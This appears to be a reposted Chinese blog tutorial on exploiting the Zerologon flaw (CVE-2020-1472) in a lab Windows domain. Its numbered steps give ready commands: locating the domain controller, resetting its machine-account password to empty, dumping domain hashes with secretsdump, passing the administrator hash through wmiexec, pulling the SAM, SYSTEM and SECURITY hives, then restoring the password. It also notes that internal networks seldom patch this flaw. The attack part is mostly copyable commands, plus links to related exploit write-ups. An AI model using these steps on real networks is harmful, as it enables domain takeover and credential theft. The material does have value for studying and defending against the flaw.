内网定位+CVE-2020-1472-利用过程

最新推荐文章于 2024-07-28 11:23:13 发布
最新推荐文章于 2024-07-28 11:23:13 发布
阅读量698 收藏
点赞数
分类专栏: 杂七杂八 文章标签: 安全 系统安全 web安全 安全架构
原文链接:https://blog.csdn.net/wuguojiuai/article/details/115385035?spm=1001.2014.3001.5502
版权

web安全学习了解:web渗透测试

官网:宣紫科技

域控(Win2008):192.168.199.131
域用户(Win7):192.168.199.128
域用户(Win03):192.168.199.129
漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472
利用+重置工具:https://github.com/risksense/zerologon
重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472
工具运行环境:https://github.com/SecureAuthCorp/impacket
1、假设已经通过 frp 代理到内网

 

2、判断域方法
(1)可以通过扫描是否开放端口:53(dns)、389(ldap)、445(rdp), 满足这几个条件,就可以判断是个域,可以尝试验证漏洞是否存在,因为内网修
这个洞的非常少,没人关注
(2)通过 nbtstat 命令
Usage:nbtstat -A 当前 IP

 

Usage:ping 域.com

 

(3)查看 systeminfo
Usage:systeminfo

 

(4)查看主机 dns
Usage:nslookup

 

(5)查看当前登录域
Usage:net config workstation

 

3、用拉登的 cs 插件扫 ldap
Usage:Ladon.exe 域地址 LdapScan
Example:Ladon.exe 192.168.199.1/24 LdapScan
(图中 IS_LDAP 表示确定 192.168.199.131 是域控)

 

3、确定域后用拉登确定域主机名
Usage:Ladon.exe 域地址 OsScan
Example:Ladon.exe 192.168.199.131 OsScan
HKServer.com\YUKONG(HKServer 是,YUKONG 是域主机名)

 

4、用验证脚本测试是否存在(测试存在) Usage:python3 zerologon_tester.py 域主机名 域地址
Example:python3 zerologon_tester.py YUKONG 192.168.199.131

 


5、再用 set_empty_pw 脚本测试
Usage: set_empty_pw.py <dc-name> <dc-ip>
Example:python3 set_empty_pw.py YUKONG 192.168.199.131
大概利用方法就是把域用户密码清空,用空密码连上去 dump 管理员的 hash

 

6、利用 secretsdump 脚本 dump 用户 hash
Usage:python3 secretsdump.py "域/主机名$"@域地址 -just-dc -no-pass
Example:
python3
secretsdump.py
"HKServer/YUKONG$"@192.168.199.131
-just-dc -no-pass
执行 dump 可以看到 YUKONG$用户的密码已经被重置成空密码,31d6cfe......

 

因为把域密码重置为空,所以-no-pass 就行了,在用户过多的情况下可以单独
dump administrator 的 hash
命令改成:-just-dc-user "administrator" 就 ok,见下图

 

7、利用 wmiexec 脚本横向连接(连接后恢复原始 hash)
Usage:
python3
wmiexec.py
域 /administrator@ 域 地 址
-hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
Example:
python3 wmiexec.py HKServer/administrator@192.168.199.131 -hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5

 

已经连上来了,可以上 cs,或者加管理员登录上去看都行,主要是恢复密码
先备份注册表(依次命令一遍):
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
(save 后缀的文件会下载到你 wmiexec 脚本的同目录)

 

8、再用 secretsdump 脚本获取原始 hash
直接退出来命令:
python3 secretsdump.py -sam sam.save -system system.save -security
security.save LOCAL

 

9、最后用 reinstall_original_pw 脚本恢复
Usage:python3 reinstall_original_pw.py
主机名 域地址
hash
Example:
python3
reinstall_original_pw.py
YUKONG
192.168.199.131
30f90a3bfe2f085a880dcf954a8825f4
10、可能会出现没有 hash 的情况,可以用 restorepassword 脚本恢复 hexpass
取第 8 步中 plan_password_hex 字段
Usage:python3 restorepassword.py DC@DC -target-ip 域地址 -hexpass

Example : python3
restorepassword.py YUKONG@YUKONG -target-ip
192.168.199.131
-hexpass
8dac4a096eec66839507b9018ace3e1ac2e27e4e81455eda7ee9e49d86a
2c57619740204e76571e512144a72c67d01e21a7d6b0c13ed4cebc97442
e1f9e75b6943c8fe4a67c0c8c6dfd0046624dd174b2dba468df3303a54a4
1be3f415f19f7cf25ae6f730cda6d125e5ebf480161b3bd9d4da2dca2f215f
01ba6b26603b8e36fd3bd86c3cb9ebba159da747df883125e6d00cbe105
c270c866d904b166bf6356f45572df5ed37976561da201e954074484b2d
b4462ae6c3d35fc0350feab07ea8868952fd8e84d9d5b66df6542e0f41a1e
283bb09c6cebfb2bb41fdc2b4d0a1ef8f5b2a94b2c3741c79f05c4edca170
11、用第 7 步看看是不是真的恢复了

 

恢复了,然后这时候假装已经通过 curl 之类的命令上了 cs,或者已经得到明文
密码,就算打下了
 

宣紫科技
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9212
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
CVE-2021-42278域内权限提升
include_voidmain的博客
03-16 4931
0x01 漏洞背景 前些日子的靶场中涉及到了域内提权,当时刚好爆出CVE-2022-42278这个域内提权漏洞,正好下载下来了POC试了试,确实不错,于是打算看看这个只需一个域用户,就能获取域控权限的漏洞怎么回事,便有了这篇文章。 0x02 环境搭建 在这搭建了一个简单的内网环境,主机AD_USER将445端口暴露在外,并且存在ms17_010,hacker通过AD_USER的445端口进入域内,随后通过CVE-2021-42287拿下AD。 环境详情: 主机IP Hacker192.168.80.12
CVE-2020-14882:Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 6164
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
内网大杀器利用CVE-2019-1040漏洞
systemino的博客
06-16 8491
概述 微软官方在6月补丁日中,发布了一枚重磅漏洞CVE-2019-1040的安全补丁。该漏洞存在于Windows大部分版本中,攻击者可以利用该漏洞可绕过NTLM MIC的防护机制,结合其他漏洞和机制,某些场景下可以导致域内的普通用户直接获取对于域控服务器的控制。 近日,对于此漏洞的利用细节被安全研究人员公布出来,利用此漏洞获取内网的控制变得非常可行,看他堪称内网大杀器,形成现实的巨大...
从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC
渗透测试研究中心
02-24 259
网络拓扑信息搜集渗透测试第一步当然是信息搜集拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,...
信安学习day4:杂(信息收集+漏洞CVE_2020_2551的介绍)
weixin_73760178的博客
08-04 394
利用第三方的服务对目标进行访问了解,如Google搜索目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹信息收集内容: 用途:1.IP地址段 信息描述目标2.域名信息 发现目标。
通过CVE-2024-4577 PHP CGI 远程代码执行入口的一次渗透
Success696的博客
06-25 1102
mimikatz抓取明文密码未成功,高版本禁止了,尝试域控提权,ms14068,CVE-2021-42287,CVE-2022-26923均不行,只有CVE-2020-1472可以利用,但该漏洞会将域内环境直接破坏(由于第一次操作时重置了域控密码,导致域内环境被破坏,无法进行复现),实操尽量多注意,至此,全部拿下。为了后续利用,还是想办法让他上线到远控工具,这web服务,进行文件上传较为简单,但需要知道一个网站目录,但我们已经可以执行命令,所以还是可以找到的。
RunC漏洞导致容器逃逸(CVE-2021-30465)
Ms08067安全实验室
01-06 1858
文章来源|MS08067 红队攻防班本文作者:BLACK(红队攻防班讲师)场景介绍runC是⼀个CLI⼯具,⽤于根据OCI规范⽣成和运⾏容器,该⼯具被⼴泛的应⽤于各种虚拟化环境中,如Kub...
CVE-2024-2961:将phpfilter任意文件读取提升为远程代码执行(RCE)
小司机的奥拓
06-06 1188
在nvd网站上是这样描述的:谷歌翻译过来就是:GNU C 库 (也就是glibc)2.39 及更早版本中的 iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时,可能会使传递给它的输出缓冲区溢出最多 4 个字节,这可能会导致应用程序崩溃或覆盖相邻变量。缓冲区溢出是二进制安全研究领域很常见的漏洞。所谓缓冲区溢出是指当一段程序尝试把更多的数据放入一个缓冲区,数据超出了缓冲区本身的容量,导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1065
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1106
大语言模型提示注入攻击安全风险分析报告下载
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 856
大语言模型(LLM)安全测评基准V1.0 发布版下载
实验室责任人员管理保障实训系统安全
最新发布
07-28 298
​ 在智慧校园的实训管理生态中,实验室责任人员的角色犹如精密机器中的关键齿轮,他们不仅是实验室安全与高效运转的守护者,更是实训教学质量的直接塑造者。这一角色的重要性,在智慧校园的数字化转型中得到了前所未有的凸显,通过一系列精心设计的功能模块,实验室责任人员得以在更加智能化、系统化的环境中履行其职责,确保每一场实训都能在安全、有序且富有成效的环境下进行。
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值